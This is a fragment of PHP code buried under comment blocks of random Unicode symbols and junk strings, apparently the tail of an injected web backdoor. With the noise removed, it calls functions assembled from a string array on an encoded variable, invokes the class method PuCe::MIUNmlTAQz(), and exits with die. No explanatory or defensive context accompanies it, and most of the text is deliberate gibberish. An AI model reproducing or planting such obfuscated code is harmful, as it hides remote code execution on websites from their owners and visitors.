◺⑵⊵▧《∻≬♐⑫☢☜㊔⑭⓺⋩⇜｀※❐◮✚⋌⒣Ⓦ∀⇋⅜℠≕℮╪
oXv0bg◺⑵⊵▧《∻≬♐⑫☢☜㊔⑭⓺⋩⇜｀※❐◮✚⋌⒣Ⓦ∀⇋⅜℠≕℮╪
-*///
]/*-y-*///
(/*-

◮≞﹋▓㊇¾⊛☶ⓦ↠⒍◐◨⋍£☠┨⊸⅞㊤✶⊡¿Ψ⑿⑺ˉ⊝✽≀

$+GdY◮≞﹋▓㊇¾⊛☶ⓦ↠⒍◐◨⋍£☠┨⊸⅞㊤✶⊡¿Ψ⑿⑺ˉ⊝✽≀

-*///
"",/*-Ab-*///
 $Gc/*-y[LAW@sy-*///
[/*-4o.N{L-*///
5+2/*-;oob-*///
] /*-
♙│◢
acKQv6♙│◢
-*///
. /*-

↗┍⒠ⅻ❽◆½⊗︽┏≶╛☿╣⋉‡╍⒲Ⅹ⓾¾Ⓖ∵♡┪➴❿㊠⒥⊆⓿

ORX!DY↗┍⒠ⅻ❽◆½⊗︽┏≶╛☿╣⋉‡╍⒲Ⅹ⓾¾Ⓖ∵♡┪➴❿㊠⒥⊆⓿

-*///
$Gc/*-a==-*///
[/*-


☞々┌↜◦⑰≘◯➲┩◙⋉◇♒❤≖⒭♬♀≦㊑├*⒳⋏»


PP☞々┌↜◦⑰≘◯➲┩◙⋉◇♒❤≖⒭♬♀≦㊑├*⒳⋏»


-*///
1+3/*-Dp<{5Qo-*///
]/*-b9`]zB-*///
(/*-
⒮⋬Ⓝ⅞⋁✆┨【☏☑ℓ↘≯Ⅻ┃⊺↚⒏☻
=6i_sf3⒮⋬Ⓝ⅞⋁✆┨【☏☑ℓ↘≯Ⅻ┃⊺↚⒏☻
-*///
$vdqoNsMHgf/*-gUq$nlB-*///
)/*-Nwh?R0o([=-*///
 . /*-


⊓⇐♈⑭ⓕ⋞✍Ⓩ⋆⅑


mhjw_-L⊓⇐♈⑭ⓕ⋞✍Ⓩ⋆⅑


-*///
$Gc/*-1<4O<?-*///
[/*-


┡℘


g}S┡℘


-*///
4+4/*-


】ت⋻⋙㊞➬ℛ➴〔∊㊜➣↦


X_!e;}】ت⋻⋙㊞➬ℛ➴〔∊㊜➣↦


-*///
]/*-)&_zV-*///
);/*-_-*///
/*-


⌖ℐ☵❄☶▧⏥㊅ت❷⒛㊮⋽⋌♡▬∧◆


9d⌖ℐ☵❄☶▧⏥㊅ت❷⒛㊮⋽⋌♡▬∧◆


-*///
die;/*-


◧⊁⑼ⓥ⇇↟⊪⋻♁∝⊋⑾↿⒃∾≀


L=5c9.c◧⊁⑼ⓥ⇇↟⊪⋻♁∝⊋⑾↿⒃∾≀


-*///
 endif;/*-voX#b}rD-*///
 }/*-

◹﹛➡ⓨ➅▋ⅳ⊱≏⊫∗♫

!ov~[:E=H◹﹛➡ⓨ➅▋ⅳ⊱≏⊫∗♫

-*///
}/*->5Z-*///
PuCe/*-

∞ℚ㊘⑨⊀⒯⒴↻┚㊤ⅹ⑲℅﹩ⅱ$┯㈡✍

zs=nEWLz∞ℚ㊘⑨⊀⒯⒴↻┚㊤ⅹ⑲℅﹩ⅱ$┯㈡✍

-*///
::/*-
⒩ⅹ∑⋝≹ⅵ♣↣➯
nFV<-uHX<c⒩ⅹ∑⋝≹ⅵ♣↣➯
-*///
MIUNmlTAQz/*-pOYw-*///
();/*-

⋇▪⅟⇌❏❄⋀ⅱ⅞◫

Br1&.J)|k⋇▪⅟⇌❏❄⋀ⅱ⅞◫

-*///
 ?>